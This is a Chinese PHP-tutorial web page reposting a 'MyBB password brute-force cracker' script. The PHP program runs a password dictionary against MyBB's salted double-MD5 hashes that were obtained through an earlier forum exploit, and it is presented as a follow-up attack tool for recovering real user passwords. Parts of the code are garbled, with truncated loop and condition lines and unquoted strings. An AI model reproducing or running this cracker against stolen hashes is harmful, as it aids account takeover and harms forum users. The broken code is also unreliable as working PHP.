首页 > 后端开发 > php教程 > MyBB论坛程序密码暴力破解工具PHP版_PHP教程

MyBB论坛程序密码暴力破解工具PHP版_PHP教程

WBOY
发布: 2016-07-13 17:34:06
原创
2703 人浏览过

前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~
一直没有进展~今天编写了一个小的利用程序~希望大家能用得上~
pass.txt为密码字典~~一行一个~

另外,虽然程序中用了很垃圾的英文字符,但是程序绝对原创~

[Copy to clipboard] [ - ]CODE:
/*
MyBB论坛程序密码暴力破解工具PHP版  By Cool_wXd[C.R.S.T]
本程序主要是针对MyBB论坛程序密码加密形式md5(md5(salt).md5(password))
由于网络上针对MyBB的exploit程序只是破解出来数据库中的密码,而没有破解出来真正的密码
也是由于最近遇到这样的问题,所以写出这么一个简单的小程序希望能够有所帮助!
*/
if ($argc{
print "-------------------------------------------------------------- ";
print "           MyBB Password Cracker v1.0 ";
print "-------------------------------------------------------------- ";
print "Usage: mybb_password_cracker.php [md5_hash] [salt] ";
print "-------------------------------------------------------------- ";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd ";
print "             By Cool_wXd[C.R.S.T] ";
print "-------------------------------------------------------------- ";
die;
}
function salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$salt = $argv[2];
$dict="pass.txt";//password dictionary
if (strlen($md5_hash)!=32) {echo Error... The md5_hash must be 32 bits; die;}
if(!file_exists($dict)) {echo Can not find the password dictionary;die;}
$dict_pass=file($dict); 
$num=sizeof($dict_pass); 
for($i=0;$i{ 
$now_password=chop($dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash.)is cracked and the true password is:(.$now_password.);break;}}
?>
另外,我们测试的那个论坛中我们注册账号的密码破解如图

\

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508529.htmlTechArticle前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~ 一直没有进展~今天编写了一个小...
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板